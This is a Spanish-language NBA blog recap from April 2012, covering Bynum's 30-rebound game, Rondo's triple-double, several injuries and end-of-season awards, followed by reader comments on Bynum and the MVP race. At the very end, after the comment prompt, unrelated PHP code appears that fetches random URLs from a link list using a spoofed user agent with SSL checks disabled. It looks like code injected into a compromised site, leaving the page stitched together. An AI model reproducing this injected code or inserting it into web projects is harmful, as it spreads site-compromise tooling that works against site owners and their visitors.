La Crónica: Merienda de rebotes, asistencias… y codazos

12 de April de 2012 por TheDeerHunter

Desayunamos con los 30 rebotes que capturó Andrew Bynum en San Antonio en una visita inesperádamente fácil de Lakers (98-84). La diferencia final de rebotes (60 a 33) es casi tan asombrosa como la efectividad triplista de Metta World Peace. La rotación interior que desplegó Popovic resultó bastante incomprensible, por otro lado. Entre los dos hombres altos que más minutos disfrutaron, Duncan y Bonner, solo capturaron 3 rebotes.

Por su parte Rajon Rondo desatascaba un choque excesivamente trabado contra Hawks con un triple doble con 20 asistencias (y 3 de 16 en tiro, todo hay que decirlo). Hubo prórroga y en ambos finales los Hawks tuvieron opción de llevarse la victoria pero un preocupante desacierto en el clutch, especialmente a estas alturas de curso, les negó el premio (86-88).

Decíamos que también fue noche de codazos. Kevin Love terminó KO en Denver a poco de comenzar, aunque Anthony Randolph a punto estuviera de liarla en su ausencia (107-113). Calderón se llevó también el segundo leñazo (involuntario) en el mismo ojo contra los Sixers en apenas una semana. Los de Philadelphia toman aire con la victoria volviendo a imponer su banco (93-75). Por si fuera poco Marc nos pegó un buen susto pegándose un batacazo en su jugada más destacada de la noche. Brillante victoria de los Grizzlies ante Phoenix con la mejor versión de Gay y un banquillo que empieza a resultar temible (93-104).

Con el ojo puesto en postemporada hubo varios choques importantes. Los Knicks dieron un paso fundamental ganando, no sin dificultad, el duelo de competencia directa contra Bucks (111-107). Melo no falló en esta ocasión, como tampoco sus compañeros disponibles. Por los Bucks, brillante Ellis y cumpliendo Jennings y Dunleavy. No hubo más y no fue suficiente.

También vital la victoria de los Jazz en Houston para no perder comba, en uno de los más destacados partidos de Hayward que se recuerdan (103-91). En el choque más vibrante de la noche CP3 daba la victoria a Clippers con una entrada inverosímil (100-98). No era la noche del “big three” de Thunder y a poco estuvo Durant de decidir el choque. Por último, los Pacers parecieron confirmar ciertas dudas dentro del blog sufriendo hasta la prórroga contra Cavs (104-98). La victoria de Hornets ante Kings, así como la de Blazers ante Warriors apenas tienen trascendencia.

PREMIOS

MVP: 2ª vez en 12 años que alguien captura 30 rebotes. En 2010 lo consiguió Kevin Love y anoche fue Andrew Bynum. 16 puntos, 30 rebotes y 2 tapones para el pívot de los Lakers. Rajon Rondo estuvo horrible en el tiro (3 de 16) pero se marcó un triple-doble con 20 asistencias incluidas (10-10-20).

Rookie: Se le va a hacer corto el año a Kenneth Faried. 2 meses más de competición y a lo mejor hay pelea por el RoY. 16 puntos, 12 rebotes, 2 robos y 2 tapones para él.

Sorpresa: Causa-efecto. Minutos para Anthony Randolph-Gran actuación. La lesión de Kevin Love le abrió las puertas y respondió con 28 puntos, 6 rebotes y 5 tapones. Algún día alguien tendrá que explicarnos como es que los entrenadores confían tan poco en él. Y Gordon Hayward nos ofreció otra gran actuación. 29 puntos y 6 asistencia para el alero de los Jazz.

Decepción: El 2 de 12 de Tony Parker y la diferencia en el rebote fueron un lastre demasiado grande para los Spurs.

Esfuerzo en vano: El talento de Monta Ellis aparece a cuentagotas desde que está en los Bucks. Sus 35 puntos, 6 rebotes, 10 asistencias y 4 robos de ayer no fueron suficientes para imponerse a los Knicks.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. Ru dice:
    #1

    Lo de Bynum es de juzgado de guardia la tontería que tiene encima…antes o después a Mike Brown se lo cargan porque vaya respeto le tienen sus jugadores.

      Citar

  2. TheDeerHunter dice:
    #2

    Ru:
    Lo de Bynum es de juzgado de guardia la tontería que tiene encima…antes o después a Mike Brown se lo cargan porque vaya respeto le tienen sus jugadores.

    ¿Ha ocurrido algo con Bynum de lo que no me haya enterado?

      Citar

  3. Ru dice:
    #3

    Justo cuando va acabar el partido: http://www.youtube.com/watch?feature=player_embedded&v=rwDluFZQmtQ

    Declaraciones postpartido: http://www.youtube.com/watch?v=r9ZRJtDi54Q

    Se rie de Mike Brown

      Citar

  4. TheDeerHunter dice:
    #4

    Lo primero una payasada, sin mucho más. Lo segundo… ¿dónde se ríe de Mike Brown? Si no me he perdido algo comenta que ha lanzado como el ojete, poco más.

      Citar

  5. AndiD dice:
    #5

    Hombre, a mi también me parece que se está riendo de todos un poco…

    Pregunta: “Estás en una lista con Chamberlain, Jabbar, Baylor, etc. Cómo te sientes?”
    Respuesta: “Sí, ya sabes, tiro como el culo”. (No creo que diga que ha tirado como el culo durante el partido, si no que tira como el culo en general).
    Y todo esto una semana después de su famoso triple.

    En fin, que no parece un chico muy maduro, todavía.

      Citar

  6. TheDeerHunter dice:
    #6

    Nah, ese tipo de cosas las decía Shaq a los 35. Me parece una chorrada simpática… lo del último triple un poco de peor gusto, por respeto a los rivales. Nada más.

    De todas formas no defiendo que está maduro, ni mucho menos. Defiendo que hay muchas cosas que tienen la importancia que se le quiera dar. Desde luego si está tirando de la cuerda contra Brown en su situación me parecería de una bajeza y una estupidez más grandes que él y eso que a Brown no le tengo la mayor de las simpatías.

      Citar

  7. TheDeerHunter dice:
    #7

    Y por cierto, no sé a que venía. Pero sí es verdad que tira bastante como el culo. Está bien que se de cuenta.

      Citar

  8. rumbero dice:
    #8

    A mi me suena un poco a vacilada la verdad. Ese último balón lo quería para lanzarse su tirito y decirle a Brown:”Si, me sigo tirando triples, que pasa?” Y luego ese comentario final…es la impresión general que me da vaya.
    Muy bien Knicks ganando a rival directo y sacando ventaja en un posible empate a final de la regular, esa prórroga Boston-Atlanta con un sangrante 4-2, y otro poster para Griffin con Ikea de por medio, casi nada…

      Citar

  9. nba dice:
    #9

    A estas alturas de Bynum, no me sorprende nada. Esperemos que en playoffs no se le crucen los cables.
    De todas maneras respecto a las declaraciones, no hay que tenerlas muy en cuenta, que hay gente con mas galones en la NBA que dicen una cosa y luego hacen otra muy distinta durante el partido

      Citar

  10. Ru dice:
    #10

    Hombre,el antecedente es que se tira un triple en un partido y la consecuencia es que su entrenador,muy enfadado,lo sienta en el banquillo por esa acción.Al jugador se la sopla y se le ve riendo en el banquillo.

    Días después acaba un partido que tienes ganado y si la última posesión es tuya lo habitual es que no juegas a meterla(en el 99% de los casos).Bynum se posiciona en la línea de triple pidiendo el balón,no se la dan y corre hacia su compañero para robarle el balón,dejando una imagen de niño de 5 años.No consigue la bola y en la entrevista postpartido dice irónicamente que “sus tiros son una mierda”.

    Para mí se rie de Mike Brown y de la consecuencia de su acción del otro día por más reprimenda que haya recibido de su entrenador.

      Citar

  11. Sancho88 dice:
    #11

    También sorprendente la resurrección de Jamaal Crawford. 34 punticos ayer, aunque intrascendentes lógicamente, viendo las nulas opciones de su equipo de entrar en playoffs. Este tipo tiene uno de los tiros más impecables que hay en la NBA, con una técnica muy buena, armando el tiro rápidamente. En los últimos partidos promedia casi 20 puntos, ayudando mucho desde el banquillo. En realidad, con el equipo que tenía Portland, yo no sé que les ha podido pasar. Ha sido el ‘batacazo’ del año para mí…

      Citar

  12. nba dice:
    #12

    Debate McMillan si, McMillan no …, que se encienden los animos

      Citar

  13. Sancho88 dice:
    #13

    Bueno, depués de lo visto hoy, está claro que Thiboddeau debe ser el entrenador del año, El concepto de equipo de los Bulls roza la excelencia, y en momentos oportunos no se nota demasiado la ausencia de Rose en la cancha. Símplemente, quien se encuentre con ellos en primera ronda caerá 4-0. Lo siento por melo…

      Citar

  14. Sancho88 dice:
    #14

    Y el MVP de la temporada regular debe ser para Kevin Durant, por mucho que nos pese a los ‘Lebronianos’. Una vez más, tenía la oportunidad de demostrar que puede echarse el equipo a la espalda en los momentos calientes, y una vez más ha rehuído toda responsabilidad… lamentable… Así, a pesar de sus grandes números esta temporada, creo que es totalmente inmerecido que se lleve el MVP.

      Citar

  15. German dice:
    #15

    Excelente victoria de los Bulls en OT gracias a la banca (anoto 47 de 96 puntos, casi el 50%). Rose no piso un segundo la pista en toda la prorroga, nefasto partido (3 pts, 1/13 de campo).
    Watson se vistio de heroe con un triplazo para empatar el juego y varias canastas y asistencias en la prorroga. Un golpe duro para el Heat y sus estrellas que se vieron superados por la segunda unidad (solo Deng jugo durante el OT y Noah el ultimo minuto por la expulsion de Gibson) de su maximo rival de conferencia.
    No se habla mucho de los Bulls pero esta temporada nuevamente son lideres de la liga y lo estan logrando pese a no contar con Rose en 23 partidos… Son un verdadero equipo: Asik, Watson, Gibson, siempre aportan y ultimamente hasta Korver y Boozer hacen lo suyo.

      Citar

  16. German dice:
    #16

    Me olvidaba… Lebron una vez mas desapareciendo en el clutch time, si bien anoto un triple que puso al frente a su equipo en el ultimo minuto (estaba totalmente abierto), fallo en la siguiente posesion y luego fallo un libre fundamental que le pudo haber dado a su equipo la ventaja de dos posesiones.
    En la prorroga ni toco el balon, aunque sus compañeros tampoco ayudaron mucho.

      Citar

  17. melo15 dice:
    #17

    Ya pero en playoffs es diferente, aver que hacen los Bulls, con su lider en ese estado de forma.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>